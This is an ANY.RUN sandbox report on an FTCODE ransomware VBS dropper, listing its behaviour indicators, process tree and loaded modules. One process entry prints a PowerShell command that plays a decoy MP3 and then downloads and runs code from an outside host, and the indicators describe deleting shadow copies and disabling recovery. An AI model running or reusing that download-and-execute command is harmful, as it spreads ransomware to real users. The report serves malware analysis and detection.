General Info

File name

Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs

Full analysis
https://app.any.run/tasks/dc24154a-36f3-4fac-a596-a4c5d8c96b2a
Verdict
Malicious activity
Analysis date
10/9/2019, 16:13:18
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

trojan

ransomware

ftcode

Indicators:

MIME:
text/plain
File info:
ASCII text, with CRLF, LF line terminators
MD5

be611918fabc12048aeba6e55f6559d7

SHA1

4cb525212460fedae4820a7cfc39e47db48c4c7b

SHA256

07c226d6e4ab84a586b1a09f09896223412de927513fda6bf13b031dc497e686

SSDEEP

48:KudJXRRAiRESdFZyRkRR8IRHRQRJf8i+:tdJBRAyTZCYR8sxEJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
on
Network geolocation
IT
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Uses Task Scheduler to run other applications
  • powershell.exe (PID: 2744)
  • powershell.exe (PID: 2460)
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 1452)
  • mmc.exe (PID: 2360)
  • schtasks.exe (PID: 2120)
Renames files like Ransomware
  • powershell.exe (PID: 2460)
FTCODE was detected
  • powershell.exe (PID: 2460)
Starts BCDEDIT.EXE to disable recovery
  • cmd.exe (PID: 2888)
Deletes shadow copies
  • cmd.exe (PID: 1576)
  • cmd.exe (PID: 2716)
Writes to a start menu file
  • powershell.exe (PID: 2460)
Reads the machine GUID from the registry
  • powershell.exe (PID: 2304)
  • WScript.exe (PID: 2980)
  • mmc.exe (PID: 2360)
  • powershell.exe (PID: 2744)
  • WScript.exe (PID: 2676)
  • vlc.exe (PID: 2296)
  • WScript.exe (PID: 2584)
  • powershell.exe (PID: 2460)
Executed via Task Scheduler
  • WScript.exe (PID: 2980)
  • WScript.exe (PID: 2676)
Creates files in the user directory
  • powershell.exe (PID: 2304)
  • powershell.exe (PID: 2744)
  • vlc.exe (PID: 2296)
  • powershell.exe (PID: 2460)
Executes PowerShell scripts
  • WScript.exe (PID: 2980)
  • WScript.exe (PID: 2676)
  • WScript.exe (PID: 2584)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 2460)
Creates files like Ransomware instruction
  • powershell.exe (PID: 2460)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2944)
Adds / modifies Windows certificates
  • IEXPLORE.EXE (PID: 2944)
Manual execution by user
  • mmc.exe (PID: 2360)
  • mmc.exe (PID: 596)
  • iexplore.exe (PID: 1952)
  • SndVol.exe (PID: 1972)
Reads settings of System Certificates
  • iexplore.exe (PID: 1952)
  • powershell.exe (PID: 2460)
Changes settings of System certificates
  • IEXPLORE.EXE (PID: 2944)
Creates files in the user directory
  • iexplore.exe (PID: 1952)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 1952)
Changes internet zones settings
  • iexplore.exe (PID: 1952)
Reads Internet Cache Settings
  • iexplore.exe (PID: 1952)
Dropped object may contain URL to Tor Browser
  • powershell.exe (PID: 2460)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 2460)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

Video and screenshots

Processes

Total processes
77
Monitored processes
26
Malicious processes
4
Suspicious processes
2

Behavior graph

+
start wscript.exe no specs #STOP powershell.exe vlc.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs wbadmin.exe no specs cmd.exe no specs wbadmin.exe no specs wbadmin.exe no specs vssadmin.exe no specs sndvol.exe no specs iexplore.exe iexplore.exe mmc.exe no specs mmc.exe wscript.exe no specs powershell.exe schtasks.exe no specs wscript.exe no specs powershell.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2584
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2460
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-Object Net.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643'));
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\program files\videolan\vlc\vlc.exe
c:\windows\system32\schtasks.exe
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.security\9ce308135fc7c9d6f24c6f8f66fad6f0\system.security.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.web\89d278aee76905ee8d74787e3d970e98\system.web.ni.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\microsoft.net\framework64\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2296
CMD
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Local\Temp\ramst007.mp3"
Path
C:\Program Files\VideoLAN\VLC\vlc.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
VideoLAN
Description
VLC media player
Version
2.2.6
Modules
Image
c:\program files\videolan\vlc\vlc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\videolan\vlc\libvlc.dll
c:\program files\videolan\vlc\libvlccore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\program files\videolan\vlc\plugins\access\libdshow_plugin.dll
c:\windows\system32\oleaut32.dll
c:\program files\videolan\vlc\plugins\audio_output\libdirectsound_plugin.dll
c:\program files\videolan\vlc\plugins\audio_output\libwaveout_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirect3d_plugin.dll
c:\program files\videolan\vlc\plugins\video_output\libdirectdraw_plugin.dll
c:\windows\system32\dsound.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\program files\videolan\vlc\plugins\control\libwin_msg_plugin.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\program files\videolan\vlc\plugins\control\libhotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\control\libwin_hotkeys_plugin.dll
c:\program files\videolan\vlc\plugins\access\libvdr_plugin.dll
c:\program files\videolan\vlc\plugins\access\libfilesystem_plugin.dll
c:\program files\videolan\vlc\plugins\gui\libqt4_plugin.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\wsock32.dll
c:\program files\videolan\vlc\plugins\stream_filter\libsmooth_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libhttplive_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\libdash_plugin.dll
c:\program files\videolan\vlc\plugins\access\libzip_plugin.dll
c:\program files\videolan\vlc\plugins\access\librar_plugin.dll
c:\program files\videolan\vlc\plugins\stream_filter\librecord_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libes_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libtheora_plugin.dll
c:\program files\videolan\vlc\plugins\codec\librawvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspeex_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libvorbis_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaes3_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liblpcm_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_h264_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_flac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_dirac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mlp_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_vc1_plugin.dll
c:\windows\system32\userenv.dll
c:\program files\videolan\vlc\plugins\codec\libsvcdsub_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspudec_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcvdsub_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_hevc_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libavcodec_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libmpeg_audio_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libtaglib_plugin.dll
c:\program files\videolan\vlc\plugins\lua\liblua_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libfolder_plugin.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\videolan\vlc\plugins\access\liblibbluray_plugin.dll
c:\program files\videolan\vlc\plugins\access\libaccess_bd_plugin.dll
c:\program files\videolan\vlc\plugins\access\libdvdnav_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libmp4_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libavi_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libasf_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libflacsys_plugin.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\program files\videolan\vlc\plugins\codec\libjpeg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcdg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libpng_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libschroedinger_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libdts_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaraw_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libsubstx3g_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libflac_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libg711_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liblibass_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libfaad_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liba52_plugin.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\audioses.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\program files\videolan\vlc\plugins\audio_mixer\libfloat_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libscaletempo_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libmpgatofixed32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsamplerate_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsimple_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tospdif_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstospdif_plugin.dll
